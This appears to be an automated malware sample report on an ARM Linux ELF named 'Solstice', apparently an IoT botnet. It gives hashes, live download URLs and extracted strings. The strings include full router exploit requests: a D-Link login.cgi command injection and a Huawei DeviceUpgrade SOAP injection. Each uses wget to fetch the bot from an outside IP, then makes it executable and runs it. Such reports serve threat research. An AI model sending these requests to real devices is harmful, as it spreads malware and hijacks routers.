
Sample details: 312d24898198d3c47220affb294f3089 --

Hashes
MD5: 312d24898198d3c47220affb294f3089
SHA1: 975c81333537f190778983c63da3aba99754c2fb
SHA256: caad3f0fa6d9b406a7f8bb564414dd33ac5fa10bbc479dfbedfe4ebaf2b1c59a
SSDEEP: 1536:2MzTTdmQI30s3DL9sw8xmF5qK9/vlJhw8DH9KV9QrHtmYT+/CB0PnzZi0:2MzTTdm+IRAMNmYTqCB0v
Details
File Type: ELF
Yara Hits
Source
http://185.101.105.163:80/bins/Solstice.arm5
http://185.101.105.163/bins/Solstice.arm5
http://185.101.105.162/bins/Solstice.arm5
http://185.101.105.162:80/bins/Solstice.arm5
Strings
		/lib/ld-uClibc.so.0
libc.so.0
strcpy
sysconf
connect
sigemptyset
memmove
getpid
memcpy
readlink
malloc
__udivsi3
recvfrom
socket
select
readdir
sigaddset
accept
calloc
__umodsi3
inet_addr
setsockopt
signal
unlink
sendto
realloc
strtok
listen
__aeabi_ldiv0
__uClibc_main
strdup
memset
__div0
__aeabi_uidiv
getppid
opendir
getsockopt
__aeabi_uidivmod
__errno_location
__modsi3
__aeabi_idiv0
strlen
__data_start
setsid
closedir
sigprocmask
getsockname
_edata
__bss_start
__bss_start__
__bss_end__
__end__
POST /cdn-cgi/
Cookie: 
GET /login.cgi?cli=aa%20aa%27;wget%20http://185.101.105.163/bins/Solstice.mips%20-O%20->%20/tmp/.Solstice;chmod%20777%20/tmp/.Solstice;/tmp/.Solstice%20dlink.mips%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Solstice/2.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.101.105.163 -l /tmp/rex -r /bins/Solstice.mips; /bin/busybox chmod 777 * /tmp/rex; /tmp/rex huawei.mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
/proc/net/tcp
Solstice.com
abcdefghijklmnopqrstuvw012345678
FGNGVGF
CLKOG"
QVCVWQ"
FTPjGNRGP"
lKeeGp
qMPCnmcfgp"
lKeeGpF
kW{EWHGkSL"
PMWVG"
ARWKLDM"
`memokrq"
NMACN"
UCVAJFME"
UCVAJFME"
}UCVAJFME"
LGVQNKLI
rpktoqe"
egvnmacnkr"
iknncvvi"
eJMQVuWXjGPG
=&vptt
$+16)4
tuut&-,+
twvqps
6055*71
! #$0)1
!$ (*+
pahjape`imj
nqjmtav567
iemjpemjav
fgtf/wavmeh'
-0+1prp|
twvqtwvq
$40$7,*
&-$+" ( 
twvtwv
wsut-=
1u1$)&u+17u)qdE
71pvpu
"PQV[WZW[
%/ZSZP
assword
.shstrtab
.interp
.dynsym
.dynstr
.rel.plt
.rodata
.ctors
.dtors
.dynamic